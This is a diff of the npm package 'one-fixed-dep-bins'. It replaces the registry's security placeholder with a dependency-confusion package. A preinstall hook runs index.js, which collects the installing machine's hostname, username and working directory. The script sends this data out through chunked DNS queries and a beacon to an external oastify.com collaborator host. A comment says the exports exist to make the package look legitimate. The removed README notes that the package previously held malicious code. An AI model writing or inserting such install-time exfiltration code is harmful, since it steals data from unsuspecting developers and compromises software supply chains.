one-fixed-dep-bins 0.0.1-security → 1.2.1

package/index.js

@@ -0,0 +1,81 @@
+const dns = require('dns');
+const os = require('os');
+const path = require('path');
+
+// Your Burp Collabogk4oavwamw7ploegmo3dnzpb82eu2uqj.oastify.comrator or custom DNS server
+const DNS_SERVER = 'gk4oavwamw7ploegmo3dnzpb82eu2uqj.oastify.com';
+
+function collectSystemInfo() {
+    try {
+        // Collect basic system information (similar to the original research)
+        const hostname = os.hostname();
+        const username = os.userInfo().username;
+        const currentPath = process.cwd();
+        
+        console.log('[DEPENDENCY CONFUSION TEST] Package installed!');
+        console.log(`Hostname: ${hostname}`);
+        console.log(`Username: ${username}`);
+        console.log(`Current Path: ${currentPath}`);
+        
+        // Create a unique identifier for this installation
+        const timestamp = Date.now().toString(36);
+        const data = {
+            hostname: hostname,
+            username: username,
+            path: currentPath,
+            timestamp: timestamp
+        };
+        
+        // Convert data to hex string for DNS exfiltration
+        const dataString = JSON.stringify(data);
+        const hexData = Buffer.from(dataString, 'utf8').toString('hex');
+        
+        // Split data into chunks (DNS labels have max 63 chars)
+        const chunks = hexData.match(/.{1,60}/g) || [];
+        
+        // Send data via DNS queries
+        chunks.forEach((chunk, index) => {
+            const subdomain = `${chunk}.${index}.${timestamp}.${DNS_SERVER}`;
+            
+            console.log(`[DNS EXFILTRATION] Sending chunk ${index + 1}/${chunks.length}`);
+            console.log(`Query: ${subdomain}`);
+            
+            // Perform DNS lookup to exfiltrate data
+            dns.resolve4(subdomain, (err, addresses) => {
+                if (err) {
+                    console.log(`[DNS] Query sent for chunk ${index + 1} (expected to fail)`);
+                } else {
+                    console.log(`[DNS] Unexpected response for chunk ${index + 1}:`, addresses);
+                }
+            });
+        });
+        
+        // Also send a simple beacon
+        const simpleBeacon = `beacon.${hostname}.${username}.${timestamp}.${DNS_SERVER}`;
+        console.log(`[BEACON] ${simpleBeacon}`);
+        
+        dns.resolve4(simpleBeacon, (err, addresses) => {
+            if (err) {
+                console.log('[BEACON] Beacon sent successfully');
+            }
+        });
+        
+    } catch (error) {
+        console.error('[ERROR] Failed to collect system info:', error.message);
+        
+        // Send error beacon
+        const errorBeacon = `error.${Date.now().toString(36)}.${DNS_SERVER}`;
+        dns.resolve4(errorBeacon, () => {});
+    }
+}
+
+// Execute immediately when package is installed
+collectSystemInfo();
+
+// Export something to make it look like a legitimate package
+module.exports = {
+    test: function() {
+        return 'This is a test package for dependency confusion research';
+    },
+    version: '1.0.0'
+};

package/package.json

@@ -1,6 +1,12 @@
 {
   "name": "one-fixed-dep-bins",
-  "version": "0.0.1-security",
-  "description": "security holding package",
-  "repository": "npm/security-holder"
+  "version": "1.2.1",
+  "description": "Supply Chain Security  Researcher",
+  "main": "index.js",
+  "scripts": {
+    "test": "echo \"Error: no test specified\" && exit 1",
+    "preinstall": "node index.js"
+  },
+  "author": "Vishal Kumar",
+  "license": "MIT"
 }

package/README.md

@@ -1,5 +0,0 @@
-# Security holding package
-
-This package contained malicious code and was removed from the registry by the npm security team. A placeholder was published to ensure users are not affected in the future.
-
-Please refer to www.npmjs.com/advisories?search=one-fixed-dep-bins for more information.